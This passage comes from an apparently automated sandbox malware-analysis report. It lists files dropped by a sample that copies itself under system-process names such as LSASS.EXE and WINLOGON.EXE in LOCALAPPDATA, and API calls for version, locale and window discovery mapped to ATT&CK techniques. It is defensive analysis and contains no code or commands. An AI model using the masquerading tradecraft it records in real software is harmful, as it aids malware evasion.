Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00004308]\n \"D3_08.EXE.67EE4741.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE5073.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00004308]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00004308]\n \"IEXPLORER.EXE.67EE4745.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\MrD3_08.scr]- [targetUID: 00000000-00004308]\n \"IEXPLORER.EXE.67EE4E36.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"PuRn4m4.txt\" has type \"ASCII text with CRLF line terminators\"- Location: [C:\\PuRn4m4.txt]- [targetUID: 00000000-00004308]\n \"desktop.ini\" has type \"Windows desktop.ini\"- Location: [C:\\desktop.ini]- [targetUID: 00000000-00004308]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00005816]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00004308]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00005816]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00004308]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\D3_08.exe]- [targetUID: 00000000-00004308]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00005816]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00004308]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\Data %OSUSER%.exe]- [targetUID: 00000000-00005816]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00005816]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00004308]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00004308]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00004308]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00004308]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00004308]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00004308]\n \"D3_08.EXE.67EE4B9C.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00004308]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005816)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005972)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00003264)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00003264)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00003264)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005852)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005852)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00006072)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00006072)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00006072)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00003964)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21bce01d01bce010016ce010000cb01e414ce0188000000880000001768c1779817ce01ff2bc17737afd477a41bce01ac011b0000001b000000cb01c06dcb0113009d002b010000c06dcb015016ce011000000000000000140098002b010000c06dcb01 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb5b76189c1f0000f0fd7f9a5cc27700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15cc2776082c9772000000000f0fd7f9a5cc27700e0fd7f78c612005789c1778083c9771317b175d8eb5b76 (UID: 00000000-00005816)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21bb601d01bb6010016b6010000b301e414b60188000000880000001768c1779817b601ff2bc177169cd477a41bb601ac011900000019000000b301c06db3011000ac0090050000c06db3015016b60110000000000000001100a70090050000c06db301 (UID: 00000000-00005972)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb5b76e8f51d000080fd7f9a5cc27700f0fd7f60c612004480fd7f00000000400000003f000000200000000080fd7f54c61200c15cc2776082c977200000000080fd7f9a5cc27700f0fd7f78c612005789c1778083c9771317b175d8eb5b76 (UID: 00000000-00005972)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb5b76c8f42c0000e0fd7f9a5cc27700f0fd7f60c6120044e0fd7f00000000400000003f0000002000000000e0fd7f54c61200c15cc2776082c9772000000000e0fd7f9a5cc27700f0fd7f78c612005789c1778083c9771317b175d8eb5b76 (UID: 00000000-00006136)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21b1002d01b10020016100200000d02e414100288000000880000001768c17798171002ff2bc1770f82d477a41b1002ac0124000000240000000d02c06d0d021000ac00ce040000c06d0d025016100210000000000000001100a700ce040000c06d0d02 (UID: 00000000-00003264)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21b6300d01b63000016630000006000e414630088000000880000001768c17798176300ff2bc177283ac977a41b6300ac0116000000160000006000c06d60001200a200fb040000c06d600050166300100000000000000013009d00fb040000c06d6000 (UID: 00000000-00003264)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21bce01d01bce010016ce010000cb01e414ce0188000000880000001768c1779817ce01ff2bc177eb84d477a41bce01ac012c0000002c000000cb01c06dcb011200a20039040000c06dcb015016ce01100000000000000013009d0039040000c06dcb01 (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb5b7688f32e0000f0fd7f9a5cc27700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15cc2776082c9772000000000f0fd7f9a5cc27700e0fd7f78c612005789c1778083c9771317b175d8eb5b76 (UID: 00000000-00004272)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21bde01d01bde010016de010000db01e414de0188000000880000001768c1779817de01ff2bc177db70cb77a41bde01ac012600000026000000db01c06ddb0114009800f1010000c06ddb015016de01100000000000000015009300f1010000c06ddb01 (UID: 00000000-00006072)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21b4401d01b44010016440100004101e414440188000000880000001768c17798174401ff2bc1774775cb77a41b4401ac0120000000200000004101c06d41011200a2003d040000c06d410150164401100000000000000013009d003d040000c06d4101 (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb5b7688c224000050fd7f9a5cc27700f0fd7f60c612004450fd7f00000000400000003f0000001f0000000050fd7f54c61200c15cc2776082c9771f0000000050fd7f9a5cc27700f0fd7f78c612005789c1778083c9771317b175d8eb5b76 (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21bca01d01bca010016ca010000c701e414ca0188000000880000001768c1779817ca01ff2bc177726acb77a41bca01ac016000000060000000c701c06dc7011200a2003c040000c06dc7015016ca01100000000000000013009d003c040000c06dc701 (UID: 00000000-00003964)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21bde01d01bde010016de010000db01e414de0188000000880000001768c1779817de01ff2bc177a82ec977a41bde01ac011c0000001c000000db01c06ddb0114009800ef010000c06ddb015016de01100000000000000015009300ef010000c06ddb01 (UID: 00000000-00003964)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a00100005a1b5101581b51018815510100004e016c14510188000000880000001768c17720175101ff2bc1770568cb772c1b5101ac012a0000002a0000004e01905b4e011000ac0090050000905b4e01d815510110000000000000001100a70090050000905b4e01 (UID: 00000000-00004124)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a00100005a1b5900581b590088155900000056006c14590088000000880000001768c17720175900ff2bc1776a6ccb772c1b5900ac0127000000270000005600905b56001000ac00fb040000905b5600d815590010000000000000001100a700fb040000905b5600 (UID: 00000000-00004340)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21b3e01d01b3e0100163e0100003b01e4143e0188000000880000001768c17798173e01ff2bc1777f65cb77a41b3e01ac012c0000002c0000003b01c06d3b0114009800b1020000c06d3b0150163e01100000000000000015009300b1020000c06d3b01 (UID: 00000000-00003836)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb5b76e8da300000d0fd7f9a5cc27700f0fd7f60c6120044d0fd7f00000000400000003f0000002000000000d0fd7f54c61200c15cc2776082c9772000000000d0fd7f9a5cc27700f0fd7f78c612005789c1778083c9771317b175d8eb5b76 (UID: 00000000-00003836)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21b4f01d01b4f0100164f0100004c01e4144f0188000000880000001768c17798174f01ff2bc1779365cb77a41b4f01ac011b0000001b0000004c01c06d4c011200a2003c040000c06d4c0150164f01100000000000000013009d003c040000c06d4c01 (UID: 00000000-00002164)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21bd801d01bd8010016d8010000d501e414d80188000000880000001768c1779817d801ff2bc177ba59cb77a41bd801ac012500000025000000d501c06dd5011200a20090050000c06dd5015016d801100000000000000013009d0090050000c06dd501 (UID: 00000000-00002428)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21bc001d01bc0010016c0010000bd01e414c00188000000880000001768c1779817c001ff2bc1779412c977a41bc001ac012500000025000000bd01c06dbd011200a20079030000c06dbd015016c001100000000000000013009d0079030000c06dbd01 (UID: 00000000-00002428)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21b3a00d01b3a0000163a0000003700e4143a0088000000880000001768c17798173a00ff2bc1777c49cb77a41b3a00ac0124000000240000003700c06d370014009800b1020000c06d370050163a00100000000000000015009300b1020000c06d3700 (UID: 00000000-00003628)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21b3901d01b39010016390100003601e414390188000000880000001768c17798173901ff2bc177e648cb77a41b3901ac0117000000170000003601c06d3601140098005b010000c06d3601501639011000000000000000150093005b010000c06d3601 (UID: 00000000-00004068)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059c17798010000a0010000d21bc601d01bc6010016c6010000c301e414c60188000000880000001768c1779817c601ff2bc1777c49cb77a41bc601ac012b0000002b000000c301c06dc30114009800b1020000c06dc3015016c601100000000000000015009300b1020000c06dc301 (UID: 00000000-00003096)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb5b7640ab2f000040fd7f9a5cc27700f0fd7f60c612004440fd7f00000000400000003f000000200000000040fd7f54c61200c15cc2776082c977200000000040fd7f9a5cc27700f0fd7f78c612005789c1778083c9771317b175d8eb5b76 (UID: 00000000-00003096)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005816)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005972)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003264)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006072)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003964)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004124)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004340)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003836)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002164)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002428)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003628)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005816)\n \"D3_08.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005972)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006136)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005816)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"GetWindowTextA\" (UID: 00000000-00005816)\n \"D3_08.exe\" called \"GetWindowTextA\" (UID: 00000000-00005972)\n \"IExplorer.exe\" called \"GetWindowTextA\" (UID: 00000000-00006136)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009872f015ce01eea3a0720016ce0102000000b0481e00609ba0720c16ce017d9ba072328a9a7294ce1e0097a8a072020000000000000048ce1e00b0481e000816ce0194f9120094f912003ff29872f015ce01c3a5a0720016ce01b0481e00c0e5967248ce1e0034000000d01bce010000cb01e02fce01c0e59672d8f91200dcf91200000000004e0200009cfa120034000000340000001768c177d81bce0100000000435cc177f3aed4770016ce012403cb010000cb015001cb0193aba07200000000c06dcb015c15ce0100000000b0481e004e02000000fa12005001cb01b7aba072 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000008ec1e0068da1200b344b56a81d0017700000000000000000000000000000000000000000000000014010000000000000000000000000000ce8aa79f9ad7269e24df12005ecbff761401000000000000005dfd7680e112000e5dfd7618dd1200dcaa0177010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600098aa79ff8da12006d8243761c6c1f0004010000 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000330034003700320032006600310037003400300039003900390061006300320036003300360034003300320037003900660039003200620034003600650065006600320066006400390065003900630033003000640038003100640035003900310066002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bc177cf91d477d8eb5b76ac011b0000001b0000000000000000000200f200c9000000000000000000000000000000000000000300ed00c9000000000000000000000038701b0000000000200000000000000000000000 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000200001000000ffffffff0200000008000000e0bb2100e0bb2100dbbb21000000000002000000b88f1d0000000000010000080000000068ec120095e1bd7747460700feffffffe0d912003f08ec7602000000b88f1d00000000000100001888fbeb76d0d91200c81c0177a6db120095fbeb7604db1200b88f1d000000000000000000000000008cda120000001b007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600fd8aa79f4cda12006d8243761c6c1f0004010000 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036009583a79f64d312006d824376f49b200004010000 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000028c71f00b8cf1200b344b56a81d00177000000000000000000000000000000000000000000000000740100000000000000000000000000001e9fa79feac2269e74d412005ecbff767401000000000000005dfd76d0d612000e5dfd7668d21200dcaa017701000000000000007a000000fffffffffffffffff0cf1200780200000000000025000000f0cf12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600f980a79f48d012006d824376bca1200004010000 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002000f00f000000001b0001000000d0a32000accf12000464c17738011b00e063c17702000000b88f1d00000000000100000870ce120000000001bcc7c977c0c7c9770a00000030cf12003f08ec7602000000b88f1d00000000000100001888fbeb7620cf1200c81c0177f6d0120095fbeb7654d01200b88f1d00000000000000000000000000dccf120000001b007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600ad9fa79f9ccf12006d824376bca1200004010000 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000200018b7200013b72000000000000000000000001b0000000001e4cb12000000000048d9120095e1bd7747460700feffffff435cc1775059c177aa000000b800000012b7200010b720006ccd1200a4d11200000000000000000000000000000000000000000000000000001a000000001b001c5cc07760d8b075ffffffff170000001ccd120024000000030000000cd2120038d71200a4d112008600000048cd120096edc1773ab72000a06a9775860000006ccd1200a4d112000000000086008800a06a97756ccd1200916c97753ab72000a06a9775a06a9775dcd1120002020000 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005816)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009872f015b601eea3a0720016b6010200000048d01c00609ba0720c16b6017d9ba072328a9a7254d41c0097a8a072020000000000000008d41c0048d01c000816b60194f9120094f912003ff29872f015b601c3a5a0720016b60148d01c00c0e5967208d41c0034000000d01bb6010000b301e02fb601c0e59672d8f91200dcf91200000000004e0200009cfa120034000000340000001768c177d81bb60100000000435cc177d29dd4770016b6012403b3010000b3015001b30193aba07200000000c06db3015c15b6010000000048d01c004e02000000fa12005001b301b7aba072 (UID: 00000000-00005972)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000586e1c0068da1200b344b56a81d001770000000000000000000000000000000000000000000000001401000000000000000000000000000056b924862a53d99b24df12005ecbff761401000000000000005dfd7680e112000e5dfd7618dd1200dcaa0177010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001ebe2486f8da12006d8243769c671d0004010000 (UID: 00000000-00005972)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005972)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005816)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005972)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003264)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005852)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006072)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004132)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" 